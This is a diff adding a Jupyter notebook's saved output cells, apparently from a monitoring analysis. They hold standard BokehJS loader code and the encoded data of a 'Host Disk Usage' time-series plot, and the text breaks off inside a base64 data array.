+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"3040\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"3040\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3040\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3040\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"c9d58b3b-6f2c-413e-af27-d7c087a5913d\" data-root-id=\"3042\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"98498484-337b-41de-bb8e-13f4f3e47330\":{\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"3053\"}],\"center\":[{\"id\":\"3056\"},{\"id\":\"3060\"},{\"id\":\"3101\"}],\"left\":[{\"id\":\"3057\"}],\"min_border_left\":50,\"plot_height\":400,\"plot_width\":900,\"renderers\":[{\"id\":\"3080\"},{\"id\":\"3107\"}],\"title\":{\"id\":\"3043\"},\"toolbar\":{\"id\":\"3067\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"3045\"},\"x_scale\":{\"id\":\"3049\"},\"y_range\":{\"id\":\"3047\"},\"y_scale\":{\"id\":\"3051\"}},\"id\":\"3042\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"3041\"},{\"id\":\"3061\"},{\"id\":\"3062\"},{\"id\":\"3063\"},{\"id\":\"3064\"},{\"id\":\"3065\"}]},\"id\":\"3067\",\"type\":\"Toolbar\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3089\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"3063\",\"type\":\"ResetTool\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"#440154\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"3079\",\"type\":\"Line\"},{\"attributes\":{},\"id\":\"3064\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"3116\",\"type\":\"Selection\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3065\",\"type\":\"PanTool\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3090\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"3074\"},\"ticker\":{\"id\":\"3054\"}},\"id\":\"3053\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3092\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3117\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3051\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3087\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3093\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3047\",\"type\":\"DataRange1d\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3094\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1595285640000.0,\"start\":1594253160000.0},\"id\":\"3045\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3097\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"3076\"}},\"id\":\"3081\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3100\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"3088\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3091\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"text\":\"Host Disk Usage\"},\"id\":\"3043\",\"type\":\"Title\"},{\"attributes\":{\"line_alpha\":0.7,\"line_color\":\"#FDE724\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"3105\",\"type\":\"Line\"},{\"attributes\":{\"items\":[{\"id\":\"3102\"},{\"id\":\"3130\"}]},\"id\":\"3101\",\"type\":\"Legend\"},{\"attributes\":{\"overlay\":{\"id\":\"3066\"}},\"id\":\"3062\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"3049\",\"type\":\"LinearScale\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"#FDE724\",\"line_width\":2,\"x\":{\"field\":\"Time\"},\"y\":{\"field\":\"Data\"}},\"id\":\"3106\",\"type\":\"Line\"},{\"attributes\":{\"data\":{\"Data\":{\"__ndarray__\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZmaeLjdl8kEfhev1AC+pQZqZGZO446lBCtejko2Um0EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADD9agHAv+9QbgehWGYk4xB16NwlXEDj0FmZmZZXMqSQRSuRxPlNYpBH4Xr9fWmjUEUrkfx8cuKQdejcFfIl41BAAAA5uWdjUEzMzPD4VmOQaRwPUJ1SIxBKVyPgNgLjkEzMzPzht+NQcP1KKBZpopBMzMz8ei3jUGkcD0KJtqOQUjheq5GW45B16NwiRFXjkEfhWtZY8mnQUjhesaLqppBexSunyeraEEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASOEqrztC1EGkcD2KPkCOQXE9CrGmW41BPQrXE+xajUHXo3D75NyNQR+F64ODNY1Brkfhin+lV0EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[240]},\"Time\":{\"__ndarray__\":\"AADAWGAzd0IAAKjHYzN3QgAAkDZnM3dCAAB4pWozd0IAAGAUbjN3QgAASINxM3dCAAAw8nQzd0IAABhheDN3QgAAANB7M3dCAADoPn8zd0IAANCtgjN3QgAAuByGM3dCAACgi4kzd0IAAIj6jDN3QgAAcGmQM3dCAABY2JMzd0IAAEBHlzN3QgAAKLaaM3dCAAAQJZ4zd0IAAPiToTN3QgAA4AKlM3dCAADIcagzd0IAALDgqzN3QgAAmE+vM3dCAACAvrIzd0IAAGgttjN3QgAAUJy5M3dCAAA4C70zd0IAACB6wDN3QgAACOnDM3dCAADwV8czd0IAANjGyjN3QgAAwDXOM3dCAACopNEzd0IAAJAT1TN3QgAAeILYM3dCAABg8dszd0IAAEhg3zN3QgAAMM/iM3dCAAAYPuYzd0IAAACt6TN3QgAA6BvtM3dCAADQivAzd0IAALj58zN3QgAAoGj3M3dCAACI1/ozd0IAAHBG/jN3QgAAWLUBNHdCAABAJAU0d0IAACiTCDR3QgAAEAIMNHdCAAD4cA80d0IAAODfEjR3QgAAyE4WNHdCAACwvRk0d0IAAJgsHTR3QgAAgJsgNHdCAABoCiQ0d0IAAFB5JzR3QgAAOOgqNHdCAAAgVy40d0IAAAjGMTR3QgAA8DQ1NHdCAADYozg0d0IAAMASPDR3QgAAqIE/NHdCAACQ8EI0d0IAAHhfRjR3QgAAYM5JNHdCAABIPU00d0IAADCsUDR3QgAAGBtUNHdCAAAAilc0d0IAAOj4WjR3QgAA0GdeNHdCAAC41mE0d0IAAKBFZTR3QgAAiLRoNHdCAABwI2w0d0IAAFiSbzR3QgAAQAFzNHdCAAAocHY0d0IAABDfeTR3QgAA+E19NHdCAADgvIA0d0IAAMgrhDR3QgAAsJqHNHdCAACYCYs0d0IAAIB4jjR3QgAAaOeRNHdCAABQVpU0d0IAADjFmDR3QgAAIDScNHdCAAAIo580d0IAAPARozR3QgAA2ICmNHdCAADA76k0d0IAAKherTR3QgAAkM2wNHdCAAB4PLQ0d0IAAGCrtzR3QgAASBq7NHdCAAAwib40d0IAABj4wTR3QgAAAGfFNHdCAADo1cg0d0IAANBEzDR3QgAAuLPPNHdCAACgItM0d0IAAIiR1jR3QgAAcADaNHdCAABYb900d0IAAEDe4DR3QgAAKE3kNHdCAAAQvOc0d0IAAPgq6zR3QgAA4JnuNHdCAADICPI0d0IAALB39TR3QgAAmOb4NHdCAACAVfw0d0IAAGjE/zR3QgAAUDMDNXdCAAA4ogY1d0IAACARCjV3QgAACIANNXdCAADw7hA1d0IAANhdFDV3QgAAwMwXNXdCAACoOxs1d0IAAJCqHjV3QgAAeBkiNXdCAABgiCU1d0IAAEj3KDV3QgAAMGYsNXdCAAAY1S81d0IAAABEMzV3QgAA6LI2NXdCAADQITo1d0IAALiQPTV3QgAAoP9ANXdCAACIbkQ1d0IAAHDdRzV3QgAAWExLNXdCAABAu041d0IAACg